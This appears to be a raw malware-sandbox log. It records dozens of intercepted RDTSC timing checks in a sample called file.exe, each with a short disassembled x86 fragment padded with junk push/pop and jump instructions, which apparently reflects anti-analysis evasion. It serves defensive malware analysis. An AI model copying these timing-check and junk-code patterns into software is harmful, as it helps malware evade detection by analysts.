Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE05A7 second address: BE05B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007FF624C752F6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE05B7 second address: BE05BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE0746 second address: BE074E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE074E second address: BE0754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE0754 second address: BE075F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE075F second address: BE0763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE0763 second address: BE0787 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007FF624C75307h 0x0000000e jmp 00007FF624C75301h 0x00000013 push eax 0x00000014 push esi 0x00000015 pop esi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE09F7 second address: BE09FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE0BAD second address: BE0BC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624C75305h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE0D1C second address: BE0D20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE0D20 second address: BE0D34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF624C752FEh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE68C4 second address: BE68CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE68CD second address: BE68D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE69FA second address: BE69FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE69FE second address: BE6A1B instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF624C752F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF624C752FFh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE6A1B second address: BE6A1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE6CFC second address: BE6D16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FF624C75304h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE6EA0 second address: BE6EA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE6FF9 second address: BE7006 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007FF624C752F6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE7006 second address: BE700A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE746B second address: BE7482 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FF624C75301h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE7E9F second address: BE7EAA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE857F second address: BE858D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF624C752FAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE858D second address: BE8591 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BEF994 second address: BEF99A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BEF592 second address: BEF596 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BEF596 second address: BEF5A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FF624C75302h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BEF5A4 second address: BEF5AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FF624B4E7D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BEF5AE second address: BEF5B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFB840 second address: BFB846 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFB846 second address: BFB84A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFB84A second address: BFB84E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFB84E second address: BFB854 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFB854 second address: BFB866 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFB866 second address: BFB86A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFB86A second address: BFB88C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7DBh 0x00000007 jmp 00007FF624B4E7DFh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFB88C second address: BFB890 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFB890 second address: BFB896 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFD33C second address: BFD35A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF624C75309h 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFD35A second address: BFD37B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF624B4E7E7h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFD37B second address: BFD37F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B393E5 second address: B393EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFD1D6 second address: BFD1E0 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF624C752F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFD1E0 second address: BFD1EC instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF624B4E7DEh 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C0131F second address: C01323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C0678E second address: C06794 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2D6F4 second address: B2D6F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2D6F8 second address: B2D712 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7E4h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2D712 second address: B2D72B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF624C75305h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1C6C2 second address: C1C6E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF624B4E7DEh 0x00000009 pop eax 0x0000000a pop edi 0x0000000b pushad 0x0000000c pushad 0x0000000d ja 00007FF624B4E7D6h 0x00000013 jnl 00007FF624B4E7D6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1AFF5 second address: C1B016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FF624C75307h 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1B016 second address: C1B01A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1B01A second address: C1B01E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1B01E second address: C1B02A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1B02A second address: C1B02E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1B02E second address: C1B068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FF624B4E7DEh 0x0000000e jg 00007FF624B4E7D6h 0x00000014 popad 0x00000015 pushad 0x00000016 jmp 00007FF624B4E7E7h 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1B068 second address: C1B06E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1B1B7 second address: C1B1CD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FF624B4E7DBh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1B1CD second address: C1B1D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1B59F second address: C1B5A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1B5A5 second address: C1B5C1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FF624C75302h 0x0000000c jmp 00007FF624C752FAh 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1B5C1 second address: C1B5DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF624B4E7E8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1B5DD second address: C1B5F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C75303h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1B5F9 second address: C1B61F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FF624B4E7D6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d popad 0x0000000e jnp 00007FF624B4E813h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FF624B4E7DAh 0x0000001b jbe 00007FF624B4E7D6h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1B782 second address: C1B788 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1B788 second address: C1B791 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1C425 second address: C1C42B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1C42B second address: C1C42F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2133C second address: C21347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C21347 second address: C21394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FF624B4E7E9h 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007FF624B4E7DEh 0x00000012 jmp 00007FF624B4E7E7h 0x00000017 jg 00007FF624B4E7D6h 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C21394 second address: C213A4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jno 00007FF624C752F6h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C213A4 second address: C213A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C21059 second address: C2105D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2E7BC second address: C2E7C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2E7C4 second address: C2E7CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3C087 second address: C3C096 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jnp 00007FF624B4E7D6h 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3F926 second address: C3F92A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3F92A second address: C3F92E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3F92E second address: C3F954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FF624C75314h 0x0000000c jmp 00007FF624C75308h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3F954 second address: C3F958 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3F958 second address: C3F95E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C59271 second address: C5927D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007FF624B4E7D6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5927D second address: C59293 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C752FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C59293 second address: C592B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C58317 second address: C58323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF624C752F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C58323 second address: C5832E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FF624B4E7D6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5832E second address: C58334 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C58334 second address: C58338 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C58338 second address: C58354 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF624C75302h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C58354 second address: C5835E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FF624B4E7D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5835E second address: C5836A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5836A second address: C58374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5BC28 second address: C5BC2D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5BCC0 second address: C5BCC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5BCC8 second address: C5BCCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5BF03 second address: C5BF1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624B4E7E8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5D450 second address: C5D49A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C75305h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FF624C75304h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 pop eax 0x00000013 jmp 00007FF624C75301h 0x00000018 popad 0x00000019 popad 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5D49A second address: C5D49E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5D49E second address: C5D4A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5EC9A second address: C5ECA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C800F0 second address: 4C800F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C800F4 second address: 4C801A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 pushad 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FF624B4E7E4h 0x00000010 sbb esi, 457E0F98h 0x00000016 jmp 00007FF624B4E7DBh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007FF624B4E7E8h 0x00000022 or al, FFFFFFF8h 0x00000025 jmp 00007FF624B4E7DBh 0x0000002a popfd 0x0000002b popad 0x0000002c call 00007FF624B4E7E8h 0x00000031 movzx eax, dx 0x00000034 pop edi 0x00000035 popad 0x00000036 push eax 0x00000037 pushad 0x00000038 mov di, AA6Eh 0x0000003c mov esi, ebx 0x0000003e popad 0x0000003f xchg eax, ebp 0x00000040 jmp 00007FF624B4E7E1h 0x00000045 mov ebp, esp 0x00000047 jmp 00007FF624B4E7DEh 0x0000004c pop ebp 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 jmp 00007FF624B4E7DDh 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C801A9 second address: 4C801AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
